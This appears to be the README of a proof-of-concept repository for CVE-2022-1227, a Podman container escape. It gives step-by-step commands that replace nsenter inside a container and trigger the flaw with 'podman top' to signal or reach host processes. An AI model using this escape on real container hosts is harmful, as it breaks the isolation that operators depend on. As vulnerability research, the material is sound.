A script for exploiting CVE-2022-1227# CVE-2022-1227_Exploit
A script for exploiting CVE-2022-1227.
## Background
- Ubuntu `20.10` is recommanded.
- Podman <`4.0.0`; `3.4.4` is recommanded.
> TODO: add what is the principle of this vulnerability
## Install podman
Follow the instruction in the official document:
<https://podman.io/getting-started/installation#installing-on-linux>
For Ubuntu `20.10`, the imstall command should be:
```bash
sudo apt-get install podman=3.4.4+ds1-1ubuntu1
```
## Quick Start
### Simple Exploit
In this section we try a simple PoC to break the bundary of `PID namespace` and `kill` a process in the host.
Here are the steps:
1. Run a container by the following command: `podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity`
2. Run `keep` in `./exp/bin` and get the `PID` it is running. Usually it will display its PID on the terminal. As the binary are set to sleep for 600 seconds, maybe you must be quick to finish the follow steps.
```plaintext
tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
My process ID is: 7719
Put this number to `PID` in the sendsig.c and compile!
```
3. Edit the source code in `./exp/src/sendsig.c` and fill in the PID obtained in the previous step in variable `pid`.
```c
int pid = OLD_VAL;
```
to
```c
int pid = 7719;
```
4. Put the compiled binary to the internal podman: `podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter`
5. Run `podman top` to trigger vulnerability by: `podman top -l`
6. If everything goes right, the running process `keep` will be killed immediately. This is unusual, because normally processes inside the container cannot send signal to processes on the host due to the PID namespace isolation.
```plaintext
tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
My process ID is: 7719
Killed
```
## Full exploit
In this section, we use sockets to realize the inter-process socket communication between the client in the container and the server on the host, which is usually impossible when the isolation mechanism is complete. We use this vulnerability to break through the isolation of net namespace to realize this exploit.
First, enter the directory by `cd ./exp`;
By simply running `./exploit.sh`, everything will be done automatically; if everything goes right, the server will display:
```plaintext
Hello from the container!
```
It means we go across the network namespace and escape.
[4.0K] /data/pocs/57f240dc830bbcd3a7f10a21868565e3f36900de
├── [4.0K] exp
│ ├── [4.0K] bin
│ │ ├── [ 16K] keep
│ │ ├── [ 16K] socket_client
│ │ └── [ 16K] socket_server
│ ├── [1.0K] exploit.sh
│ └── [4.0K] src
│ ├── [ 378] keep.c
│ ├── [ 490] sendsig.c
│ ├── [ 953] socket_client.c
│ └── [1.3K] socket_server.c
├── [ 11K] LICENSE
└── [2.4K] README.md
3 directories, 10 files